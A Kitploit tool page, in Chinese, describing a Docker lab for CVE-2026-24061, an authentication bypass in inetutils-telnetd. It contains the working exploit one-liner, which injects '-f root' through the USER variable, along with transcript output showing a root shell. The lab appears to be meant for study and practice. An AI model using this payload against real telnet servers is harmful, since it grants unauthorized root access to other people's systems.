Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
inetutils-telnetd-auth-bypass — 一个小型 Docker 实验环境,用于演练 cve-2026-24061,即 inetutils-telnetd 身份验证绕过漏洞。 | Kitploit
工具/GitHubGitHub/leonjza/inetutils-telnetd-auth-bypass
漏洞分析漏洞利用渗透测试身份验证实验室与实践
GitHubleonjza/inetutils-telnetd-auth-bypass

inetutils-telnetd-auth-bypass

一个小型 Docker 实验环境,用于演练 cve-2026-24061,即 inetutils-telnetd 身份验证绕过漏洞。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
1257个月前尚未审核
分享

inetutils-telnetd 认证绕过实验环境,CVE-2026-24061

一个用于研究 inetutils-telnetd 1.9.3 - 2.7 中认证绕过漏洞的小型实验环境,该漏洞已在 oss-sec 邮件列表中披露。[0]

此容器依赖于 Debian 11 (Bullseye) 中 inetutils-telnetd 仍为易受攻击版本这一事实。在创建此环境时,其版本为:

root@kitploit:~
root@ba8cc6858b87:/# apt search inetutils-telnetd
Sorting... Done
Full Text Search... Done
inetutils-telnetd/oldoldstable 2:2.0-1+deb11u2 arm64
  telnet server

构建

使用 docker build -t telnetd-exploit . 克隆并构建容器。

运行

使用 docker run --rm -it telnetd-exploit 运行容器。将显示一条消息,展示 PoC。

root@kitploit:~
docker run --rm -it telnetd-exploit
Starting internet superserver: inetd.
You are user1. Try telnet as root with: USER='-f root' telnet -a localhost
user1@114102afa5d3:/$

一次成功的运行看起来大致如下:

root@kitploit:~
user1@114102afa5d3:/$ USER='-f root' telnet -a localhost
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.17.8 (114102afa5d3) (pts/1)

Linux 114102afa5d3 6.17.8 #1 SMP PREEMPT Thu Nov 20 09:34:02 UTC 2025 aarch64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@114102afa5d3:~#

[0] https://seclists.org/oss-sec/2026/q1/89

下载工具